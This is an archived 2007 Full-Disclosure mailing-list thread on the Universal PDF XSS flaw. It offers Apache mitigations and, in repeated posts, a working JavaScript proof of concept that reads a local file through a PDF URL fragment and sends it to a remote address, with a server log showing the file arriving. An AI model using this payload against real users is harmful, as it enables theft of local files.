Re: [Full-disclosure] Universal PDF XSS After Party(posible solution)
If I recall correctly from the Content-Disposition HTML attachment
handling vulnerabilities last year, Opera didn't reliably abide by the
Content-Disposition header.
Additionally, Content-Disposition support in IE, Firefox, Opera,
Safari and a few others was extremely inconsistent from version to
version.
--
Thank you,
Darren Bounds
On 1/4/07, Noe Espinoza M. <[EMAIL PROTECTED]> wrote:
> We need to force to the users do download the pdf files
>
> And we can add to the httpd.conf or .htaccess the next code
>
> SetEnvIf Request_URI "\.pdf$" requested_pdf=pdf
> Header add Content-Disposition "Attachment" env=requested_pdf
>
>
> Other solution is protect our pdf files to external links (hotlinking)
>
> Add in .htacces
>
> RewriteEngine on
> RewriteCond %{HTTP_REFERER} !^$
> RewriteCond %{HTTP_REFERER} !^http://([-a-z0-9]+\.)?example\.com[NC]
> RewriteRule .*\.(pdf)$ http://www.example.com/images/noexternal.gif [R,NC,L]
>
>
> Source from
> http://seguinfo.blogspot.com/2007/01/hacking-con-browser-plugins.html
>
>
>
> -Mensaje original-
> De: pdp (architect) [mailto:[EMAIL PROTECTED]
> Enviado el: jueves, 04 de enero de 2007 7:17
> Para: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com; Web
> Security
> Asunto: Universal PDF XSS After Party
>
> Everybody knows about it. Everybody talks about it. We had a nice
> party. It is time for estimating the damages. In this article I will
> try to show the impact of the Universal PDF XSS vulnerability by
> explaining how it can be used in real life situations.
>
> http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/
>
> --
> pdp (architect) | petko d. petkov
> http://www.gnucitizen.org
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Universal PDF XSS After Party(posible solution)
We need to force to the users do download the pdf files
And we can add to the httpd.conf or .htaccess the next code
SetEnvIf Request_URI "\.pdf$" requested_pdf=pdf
Header add Content-Disposition "Attachment" env=requested_pdf
Other solution is protect our pdf files to external links (hotlinking)
Add in .htacces
RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://([-a-z0-9]+\.)?example\.com[NC]
RewriteRule .*\.(pdf)$ http://www.example.com/images/noexternal.gif [R,NC,L]
Source from
http://seguinfo.blogspot.com/2007/01/hacking-con-browser-plugins.html
-Mensaje original-
De: pdp (architect) [mailto:[EMAIL PROTECTED]
Enviado el: jueves, 04 de enero de 2007 7:17
Para: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com; Web
Security
Asunto: Universal PDF XSS After Party
Everybody knows about it. Everybody talks about it. We had a nice
party. It is time for estimating the damages. In this article I will
try to show the impact of the Universal PDF XSS vulnerability by
explaining how it can be used in real life situations.
http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/
--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Universal PDF XSS After Party
Shows up in a log like this:
127.0.0.1 - - [04/Jan/2007:10:57:03 -0500] "GET
/whatever.htm?content=%3Chtml%3E%3Chead%3E%3Cmeta%20http-equiv=%22content-type%22%20content=%22text/html;charset=ISO-8859-1%22%3E%3Cmeta%20name=%22generator%22%20content=%22Adobe%20GoLive%205%22%3E%3Ctitle%3EAdobe%20Acrobat%20Standard%20and%20Professional%20Read%20Me%3C/title%3E%3C/head%3E%3Cbody%20bgcolor=%22
HTTP/1.1" 404 403 "" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:
1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
You could obviously a few iframes open on a site that would transfer each
chunk of the file, 64 bit encoded or what have you.
On 1/4/07, T Biehn <[EMAIL PROTECTED]> wrote:
file:///C:/Program Files/Adobe/Acrobat
6.0/Resource/ENUtxt.pdf#something=javascript:function
cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return
new ActiveXObject(' Microsoft.XMLHTTP');}catch(e){}try{return new
XMLHttpRequest();}catch(e){} return null;}var xhr =
cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4){alert(
xhr.responseText);window.location = "http://localhost:80/whatever.htm?content=";
+ xhr.responseText;}};xhr.open('GET', 'file:///C:/ProgramFiles/Adobe/Acrobat
6.0/ReadMe.htm', true);xhr.send(null); <- sends a local file to a remote
location.
Readable:
function cXHR(){ //Grabs a legit XHR.
try{
return new ActiveXObject('Msxml2.XMLHTTP');
}catch(e){}
try{
return new ActiveXObject('Microsoft.XMLHTTP ');
}catch(e){}
try{
return new XMLHttpRequest();
}catch(e){}
return null;
}
var xhr = cXHR(); //For grabbing
xhr.onreadystatechange = function(){
if (xhr.readyState == 4){
alert(xhr.responseText);
window.location = "http://localhost:80/whatever.htm?content="; +
xhr.responseText;
}
};
xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm',
true);
xhr.send(null);
Works in FFOX / Opera, not in IE.
On 1/4/07, pdp (architect) <[EMAIL PROTECTED]> wrote:
>
> Everybody knows about it. Everybody talks about it. We had a nice
> party. It is time for estimating the damages. In this article I will
> try to show the impact of the Universal PDF XSS vulnerability by
> explaining how it can be used in real life situations.
>
> http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/
>
> --
> pdp (architect) | petko d. petkov
> http://www.gnucitizen.org
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Universal PDF XSS After Party
file:///C:/Program Files/Adobe/Acrobat
6.0/Resource/ENUtxt.pdf#something=javascript:function
cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return
new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new
XMLHttpRequest();}catch(e){} return null;}var xhr =
cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4){alert(
xhr.responseText);window.location = "
http://localhost:80/whatever.htm?content="; +
xhr.responseText;}};xhr.open('GET',
'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm',
true);xhr.send(null); <- sends a local file to a remote location.
Readable:
function cXHR(){ //Grabs a legit XHR.
try{
return new ActiveXObject('Msxml2.XMLHTTP');
}catch(e){}
try{
return new ActiveXObject('Microsoft.XMLHTTP');
}catch(e){}
try{
return new XMLHttpRequest();
}catch(e){}
return null;
}
var xhr = cXHR(); //For grabbing
xhr.onreadystatechange = function(){
if (xhr.readyState == 4){
alert(xhr.responseText);
window.location = "http://localhost:80/whatever.htm?content="; +
xhr.responseText;
}
};
xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm',
true);
xhr.send(null);
Works in FFOX / Opera, not in IE.
On 1/4/07, pdp (architect) <[EMAIL PROTECTED]> wrote:
Everybody knows about it. Everybody talks about it. We had a nice
party. It is time for estimating the damages. In this article I will
try to show the impact of the Universal PDF XSS vulnerability by
explaining how it can be used in real life situations.
http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/
--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Universal PDF XSS After Party
Everybody knows about it. Everybody talks about it. We had a nice party. It is time for estimating the damages. In this article I will try to show the impact of the Universal PDF XSS vulnerability by explaining how it can be used in real life situations. http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
